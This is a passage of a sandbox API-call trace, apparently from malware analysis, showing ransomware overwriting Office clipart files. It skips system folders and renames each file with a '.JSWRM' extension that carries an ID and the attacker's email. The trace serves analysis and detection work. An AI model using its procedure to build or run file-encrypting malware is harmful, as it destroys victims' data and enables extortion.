1 [0095.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0095.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0095.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0095.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.233] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03380I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03380i.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03380I.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03380i.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0095.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0095.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0095.234] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbdae, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH03425I.JPG", cAlternateFileName="")) returned 1 [0095.234] lstrcmpiW (lpString1="PH03425I.JPG", lpString2=".") returned 1 [0095.234] lstrcmpiW (lpString1="PH03425I.JPG", lpString2="..") returned 1 [0095.234] lstrcmpiW (lpString1="PH03425I.JPG", lpString2="...") returned 1 [0095.234] lstrcmpiW (lpString1="PH03425I.JPG", lpString2="windows") returned -1 [0095.234] lstrcmpiW (lpString1="PH03425I.JPG", lpString2="recovery") returned -1 [0095.234] lstrcmpiW (lpString1="PH03425I.JPG", lpString2="perflogs") returned 1 [0095.234] lstrcmpiW (lpString1="PH03425I.JPG", lpString2="documents and settings") returned 1 [0095.234] lstrcmpiW (lpString1="PH03425I.JPG", lpString2="$RECYCLE.BIN") returned 1 [0095.234] lstrcmpiW (lpString1="PH03425I.JPG", lpString2="system volume information") returned -1 [0095.234] lstrcmpiW (lpString1="PH03425I.JPG", lpString2="msocache") returned 1 [0095.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0095.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03425I.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03425I.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03425I.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0095.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0095.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03425I.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03425I.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03425I.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0095.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0095.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0095.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0095.235] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03425I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03425i.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.235] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=48558) returned 1 [0095.235] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbda0) returned 0x24d210 [0095.235] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xbda0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xbda0, lpOverlapped=0x0) returned 1 [0095.259] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.259] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xbda0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xbda0, lpOverlapped=0x0) returned 1 [0095.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.260] CloseHandle (hObject=0x314) returned 1 [0095.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0095.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0095.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0095.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0095.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0095.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0095.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.260] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03425I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03425i.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03425I.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03425i.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0095.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0095.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0095.261] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xef6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PRRT.WMF", cAlternateFileName="")) returned 1 [0095.261] lstrcmpiW (lpString1="PRRT.WMF", lpString2=".") returned 1 [0095.261] lstrcmpiW (lpString1="PRRT.WMF", lpString2="..") returned 1 [0095.261] lstrcmpiW (lpString1="PRRT.WMF", lpString2="...") returned 1 [0095.262] lstrcmpiW (lpString1="PRRT.WMF", lpString2="windows") returned -1 [0095.262] lstrcmpiW (lpString1="PRRT.WMF", lpString2="recovery") returned -1 [0095.262] lstrcmpiW (lpString1="PRRT.WMF", lpString2="perflogs") returned 1 [0095.262] lstrcmpiW (lpString1="PRRT.WMF", lpString2="documents and settings") returned 1 [0095.262] lstrcmpiW (lpString1="PRRT.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.262] lstrcmpiW (lpString1="PRRT.WMF", lpString2="system volume information") returned -1 [0095.262] lstrcmpiW (lpString1="PRRT.WMF", lpString2="msocache") returned 1 [0095.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0095.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRRT.WMF", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0095.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRRT.WMF", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PRRT.WMF", lpUsedDefaultChar=0x0) returned 8 [0095.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0095.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0095.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRRT.WMF", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0095.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRRT.WMF", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PRRT.WMF", lpUsedDefaultChar=0x0) returned 8 [0095.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0095.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0095.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0095.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0095.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRT.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\prrt.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.263] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3830) returned 1 [0095.263] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xef0) returned 0x23fc98 [0095.263] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xef0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xef0, lpOverlapped=0x0) returned 1 [0095.265] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.265] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xef0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xef0, lpOverlapped=0x0) returned 1 [0095.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0095.265] CloseHandle (hObject=0x314) returned 1 [0095.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0095.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0095.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0095.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0095.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0095.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0095.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0095.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0095.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0095.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0095.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.266] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRT.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\prrt.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRT.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\prrt.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0095.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0095.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0095.267] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7aac, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PRRTINST.WMF", cAlternateFileName="")) returned 1 [0095.267] lstrcmpiW (lpString1="PRRTINST.WMF", lpString2=".") returned 1 [0095.267] lstrcmpiW (lpString1="PRRTINST.WMF", lpString2="..") returned 1 [0095.267] lstrcmpiW (lpString1="PRRTINST.WMF", lpString2="...") returned 1 [0095.267] lstrcmpiW (lpString1="PRRTINST.WMF", lpString2="windows") returned -1 [0095.267] lstrcmpiW (lpString1="PRRTINST.WMF", lpString2="recovery") returned -1 [0095.267] lstrcmpiW (lpString1="PRRTINST.WMF", lpString2="perflogs") returned 1 [0095.267] lstrcmpiW (lpString1="PRRTINST.WMF", lpString2="documents and settings") returned 1 [0095.267] lstrcmpiW (lpString1="PRRTINST.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.267] lstrcmpiW (lpString1="PRRTINST.WMF", lpString2="system volume information") returned -1 [0095.267] lstrcmpiW (lpString1="PRRTINST.WMF", lpString2="msocache") returned 1 [0095.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0095.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRRTINST.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRRTINST.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PRRTINST.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0095.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0095.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRRTINST.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRRTINST.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PRRTINST.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0095.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0095.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0095.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0095.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRTINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\prrtinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.268] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31404) returned 1 [0095.268] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7aa0) returned 0x24d210 [0095.269] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7aa0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7aa0, lpOverlapped=0x0) returned 1 [0095.273] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.273] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7aa0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7aa0, lpOverlapped=0x0) returned 1 [0095.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.274] CloseHandle (hObject=0x314) returned 1 [0095.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0095.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0095.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0095.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0095.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0095.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0095.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.274] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRTINST.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\prrtinst.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRTINST.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\prrtinst.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0095.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0095.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0095.275] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3d6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PSRETRO.WMF", cAlternateFileName="")) returned 1 [0095.275] lstrcmpiW (lpString1="PSRETRO.WMF", lpString2=".") returned 1 [0095.275] lstrcmpiW 